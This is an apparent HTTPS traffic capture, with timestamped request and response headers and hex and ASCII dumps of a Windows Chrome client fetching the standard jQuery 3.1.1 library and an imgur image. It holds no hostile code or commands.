7b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 Data Ascii: position: relative; display: block; padding: .75rem 1.25rem; margin-bottom: -1px; background-color: #fff; border: 1px solid rgba(0, 0, 0, .125) } .list-group-item:first-child { border-t

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:04 UTC	505	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:04 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Tue, 25 Feb 2025 01:20:04 GMT Age: 1680635 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740043-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 1 X-Timer: S1740446404.115079,VS0,VE1 Vary: Accept-Encoding
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\\("+K+"((?:-\\d)?\\d)"+K+"\\)\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-02-25 01:20:04 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:05 UTC	364	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:05 UTC	612	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Tue, 25 Feb 2025 01:20:05 GMT Age: 1680636 X-Served-By: cache-lga21947-LGA, cache-nyc-kteb1890050-NYC X-Cache: HIT, HIT X-Cache-Hits: 363, 1 X-Timer: S1740446405.151463,VS0,VE2 Vary: Accept-Encoding
2025-02-25 01:20:05 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-02-25 01:20:05 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-02-25 01:20:05 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-02-25 01:20:05 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-02-25 01:20:05 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-02-25 01:20:05 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:05 UTC	553	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:05 UTC	758	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 149462 Date: Tue, 25 Feb 2025 01:20:05 GMT X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740067-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 0 X-Timer: S1740446405.299838,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
